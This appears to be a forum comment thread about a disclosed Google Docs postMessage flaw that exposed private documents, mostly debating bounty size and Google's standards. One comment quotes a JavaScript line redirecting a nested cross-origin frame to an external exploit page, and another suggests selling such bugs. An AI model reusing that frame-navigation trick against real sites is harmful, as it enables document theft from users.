Stealing private documents through a bug in Google Docs

A few years ago, I built a platform for a client that allowed his customers to show a &quot;Text Me&quot; widget on their websites; the software handled all of the SMS &#x2F; messaging and basically substituted conventional contact form or Intercom integration.<p>His customers used Google AdSense, who started blocking them until they removed the widget. The reason? This widget used an Iframe postMessage, but appropriately specified the singular sandboxed domain. As expected, we never were able to speak with a human at Google- they just sent my clients customers intimidating emails about a security flaw on their websites.<p>Seeing Google abuse the postMessage API with a wildcard argument after this fiasco is maddening! If only they were held to their own arbitrary and vague standards.

This was a bug that affected multiple products and even crossed into the enterprise suite and google only rewarded $3.3K USD?<p>It’s almost as bad as Apple’s reward program

The most surprising part to me is that this works:<p><pre><code> window.frames[0].frame[0][2].location=&quot;https:&#x2F;&#x2F;geekycat.in&#x2F;exploit.html&quot;; </code></pre> It&#x27;s expected to me that you can change `window.frames[0].location`, since you can also change the &quot;src&quot; attribute of the iframe element. But you can&#x27;t change the &quot;src&quot; attribute of an iframe inside that iframe, if it&#x27;s not same-origin - so why can you change its location?<p>Maybe we should look into whether changing this would break any websites.

To the people publishing these exploits and collecting the trivial bounties.<p>Hats off to you, no idea why you wouldn&#x27;t just sell this off considering how poorly your honesty is rewarded.

Curious question, if you find a few vulnerabilities like this, does it mean that you could get hired by Google to do this internally?<p>What I&#x27;m trying to ask is: does this make the hiring process easier?

Good lord, $3K for this?<p>These companies give two craps about security.

Google should have awarded a much larger value to this. Like $100k. This is a serious flaw.

Client-side encryption really decreases the attack surfaces of cloud storage solutions.<p>It’s really sad that Keybase failed at building a business around this. Hopefully someone else is going to make another attempt.

Thanks for going through the write-up. As an author of the bug,considering the the impact, user interaction required and other criteria that need to line up to exploit this bug I feel Google VRP&#x27;s decision on this bug is accurate.

TBO not surprised at all Gdocs had an issue